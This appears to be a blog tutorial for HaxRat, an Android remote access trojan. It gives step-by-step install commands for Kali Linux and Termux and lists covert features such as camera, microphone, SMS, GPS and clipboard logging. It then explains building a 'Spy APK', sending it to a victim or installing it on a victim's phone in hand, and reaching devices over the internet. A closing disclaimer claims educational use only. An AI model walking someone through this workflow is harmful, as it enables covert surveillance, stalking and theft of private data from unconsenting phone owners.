Take Total Control on Android Remotely: HaxRat

Posted by
HaxRat is a cloud-based remote android management suite in simple word it is an Android RAT, powered by NodeJS. It works in Linux and Termux (Android).

Previously we have featured an article on L3MON, HaxRat is based on L3MON but much more powerful then L3MON. It has some extra features like the screenshot, screen recording, front and rear camera recording. The Key features of HaxRat are the following:

Key Features of HaxRat

  • Screenshot Capture.
  • Screen Recorder.
  • Rear Camera Recorder.
  • Front Camera Recorder.
  • Lock Device.
  • GPS Logging.
  • Microphone Recording.
  • View Contacts.
  • SMS Logs.
  • Send SMS.
  • Call Logs.
  • View Installed Apps.
  • View Stub Permissions.
  • Live Clipboard Logging.
  • Live Notification Logging.
  • View WiFi Networks (logs previously seen).
  • File Explorer & Downloader.
  • Command Queuing.
  • Built-In APK Builder.

We can easily install this suite on Linux, we also can install it on our Android phone by using Termux.

Installing HaxRat on Kali Linux

The installation process is the same as we did in our L3MON tutorial. We have a detailed discussion on our that post So we are not going to explain the commands.

First, we install JRE in Kali by using the following command:

sudo apt-get install openjdk-8-jre

Then we download NodeJs in our system by applying the following command:

curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -

Now we install NodeJs by preceding following command:

sudo apt-get install -y nodejs

Now we need pm2 process manager to install this we use the following command:

sudo npm install pm2 -g

Now we clone haxRat from it’s GitHub repository by using the following command:

git clone https://github.com/Hax4us/haxRat

Then we navigate to the server directory under haxRat by using cd command:

cd /haxRat/server

Then we need to install dependencies by using the following command:

npm install

Then we start the server by using the following command:

node index.js

Now we can see our server in our browser http://localhost:22533 there will be a login page like the following screenshot:

haxrat login panel

Now we stop this server by using CTRL+C command. Now, what to do? Login? But where are the credentials?  We have talked before how to create a custom credential on our older L3MON tutorial. Otherwise check the haxRat GitHub repository for default credentials.

After login we can see the main page as shown in the following screenshot:

haxrat dashboard termux

Now we go to the APK Builder page and give our local IP address and click on build.

If a got  error like “Wrong java Version installed…..” this when building APK then try the following command:

sudo update-alternatives --config java

Then we type 2 and enter.

Then we stop our running haxRat server by CTRL+C and start it again this problem will be solved.

Now we can build Spy APK and send it to the victim, whenever the victim installs it and grant the permission. Or if we got a victim’s phone in hand then we can implement this.

We got the victim in our haxRat dashboard like the following screenshot:

haxrat dashboard

Now in the manage section, we can manage the Android device totally. Magics will start from here.

Installed Android Apps
File Manager
Recording from front Camera

Installing HaxRat on Android (using Termux)

This is easy to install in Termux. We try following commands one after another to install and configure haxRat.

apt install nodejs
git clone https://github.com/hax4us/haxRat.git
cd haxRat/server
npm install
mkdir ~/haxrat 
node index.js

In our browser, we navigate to Http://<Local IP>:22533 and we will be the login screen of haxRat.

This is how we can start the haxrat server and take control of any android device on our local network. We also can run this on a wide network or internet by using PortMap service.


Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial.
HaxRat is built and our article is documented for both Educational and Internal use ONLY.

Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.